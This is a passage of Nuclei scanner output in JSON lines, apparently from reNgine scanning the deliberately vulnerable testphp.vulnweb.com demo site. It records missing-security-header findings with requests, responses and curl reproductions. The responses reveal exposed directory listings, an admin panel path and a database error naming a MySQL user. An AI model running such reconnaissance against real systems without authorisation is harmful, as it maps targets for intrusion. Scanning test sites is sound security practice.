--\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:37.554139461Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-resource-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-2/3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-2/3 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Web Camera A4Tech PK-335E\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:38.078205075Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-permitted-cross-domain-policies\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-2/A01\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-2/A01 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Web Camera A4Tech PK-335E\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:38.078252826Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-content-type-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/_mmServerScripts\",\"path\":\"/_mmServerScripts\",\"matched-at\":\"http://testphp.vulnweb.com/_mmServerScripts/\",\"request\":\"GET /_mmServerScripts HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 Edg/92.0.902.62\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003eIndex of /_mmServerScripts/\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ch1\\u003eIndex of /_mmServerScripts/\\u003c/h1\\u003e\\u003chr\\u003e\\u003cpre\\u003e\\u003ca href=\\\"../\\\"\\u003e../\\u003c/a\\u003e\\r\\n\\u003ca href=\\\"MMHTTPDB.php\\\"\\u003eMMHTTPDB.php\\u003c/a\\u003e 11-May-2011 10:27 2111\\r\\n\\u003ca href=\\\"mysql.php\\\"\\u003emysql.php\\u003c/a\\u003e 11-May-2011 10:27 10634\\r\\n\\u003c/pre\\u003e\\u003chr\\u003e\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:38.078213102Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 Edg/92.0.902.62' 'http://testphp.vulnweb.com/_mmServerScripts'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-resource-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1\",\"path\":\"/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1\",\"request\":\"GET /Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:38.078359532Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-frame-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop\",\"path\":\"/Mod_Rewrite_Shop\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/\",\"request\":\"GET /Mod_Rewrite_Shop HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:56.0) Gecko/20100101 Firefox/56.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003cdiv id=\\\"content\\\"\\u003e\\r\\n\\t\\u003cdiv class='product'\\u003e\\u003ctable\\u003e\\u003ctr\\u003e\\u003ctd width='180px'\\u003e\\u003cimg src='images/1.jpg'\\u003e\\u003c/td\\u003e\\u003ctd width='400px'\\u003e\\u003ca href='Details/network-attached-storage-dlink/1/'\\u003eNetwork Storage D-Link DNS-313 enclosure 1 x SATA\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd width='50px' bgcolor='#F8F8F8'\\u003e\\u003ca href='Details/network-attached-storage-dlink/1/'\\u003ePrice\\u003cbr\\u003e359 \\u0026euro;\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/table\\u003e\\u003c/tr\\u003e\\u003c/div\\u003e\\u003cdiv class='product'\\u003e\\u003ctable\\u003e\\u003ctr\\u003e\\u003ctd width='180px'\\u003e\\u003cimg src='images/2.jpg'\\u003e\\u003c/td\\u003e\\u003ctd width='400px'\\u003e\\u003ca href='Details/web-camera-a4tech/2/'\\u003eWeb Camera A4Tech PK-335E\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd width='50px' bgcolor='#F8F8F8'\\u003e\\u003ca href='Details/web-camera-a4tech/2/'\\u003ePrice\\u003cbr\\u003e10 \\u0026euro;\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/table\\u003e\\u003c/tr\\u003e\\u003c/div\\u003e\\u003cdiv class='product'\\u003e\\u003ctable\\u003e\\u003ctr\\u003e\\u003ctd width='180px'\\u003e\\u003cimg src='images/3.jpg'\\u003e\\u003c/td\\u003e\\u003ctd width='400px'\\u003e\\u003ca href='Details/color-printer/3/'\\u003eLaser Color Printer HP LaserJet M551dn, A4\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd width='50px' bgcolor='#F8F8F8'\\u003e\\u003ca href='Details/color-printer/3/'\\u003ePrice\\u003cbr\\u003e812 \\u0026euro;\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/table\\u003e\\u003c/tr\\u003e\\u003c/div\\u003e\\u003c/div\\u003e\\r\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:38.078390283Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:56.0) Gecko/20100101 Firefox/56.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-content-type-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/bxss/adminPan3l\",\"path\":\"/bxss/adminPan3l\",\"matched-at\":\"http://testphp.vulnweb.com/bxss/adminPan3l/\",\"request\":\"GET /bxss/adminPan3l HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:35 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003chead\\u003e\\n \\u003ctitle\\u003eAdministrative panel\\u003c/title\\u003e \\n \\u003clink rel=\\\"stylesheet\\\" type=\\\"text/css\\\" href=\\\"style.css\\\"\\u003e \\n\\u003c/head\\u003e\\n \\n\\u003cbody\\u003e\\n\\u003cp\\u003e \\n \\u003ccenter\\u003e\\n \\u003cimg src=\\\"http://www.acunetix.com/wp-content/themes/acunetix/images/logo.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\n \\u003ch2\\u003eAdministrative Panel\\u003c/h2\\u003e\\n \\u003c/center\\u003e\\n\\u003c/p\\u003e \\n \\n\\u003cb\\u003eLast 100 visitors on this site\\u003c/b\\u003e\\n\\n\\nDeprecated: mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /hj/var/www/bxss/database_connect.php on line 2\\n\\nWarning: mysql_connect(): Access denied for user 'bxss'@'localhost' (using password: YES) in /hj/var/www/bxss/database_connect.php on line 2\\nWebsite is out of order. Please visit back later. Thank you for understanding.\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:38.73931798Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0' 'http://testphp.vulnweb.com/bxss/adminPan3l'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"referrer-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/admin\",\"path\":\"/admin\",\"matched-at\":\"http://testphp.vulnweb.com/admin/\",\"request\":\"GET /admin HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_6_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:35 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003eIndex of /admin/\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ch1\\u003eIndex of /admin/\\u003c/h1\\u003e\\u003chr\\u003e\\u003cpre\\u003e\\u003ca href=\\\"../\\\"\\u003e../\\u003c/a\\u003e\\r\\n\\u003ca href=\\\"create.sql\\\"\\u003ecreate.sql\\u003c/a\\u003e 11-May-2011 10:27 523\\r\\n\\u003c/pre\\u003e\\u003chr\\u003e\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:38.739350584Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_6_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36' 'http://testphp.vulnweb.com/admin'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-frame-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-2\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-2 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:38.739354601Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"content-security-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-2/3L\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-2/3L HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.53\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Web Camera A4Tech PK-335E\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:38.739376442Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.53' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-resource-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-3/A01\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-3/A01 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:41:33 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e Laser Color Printer HP LaserJet M551dn, A4\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:39.361977456Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36' 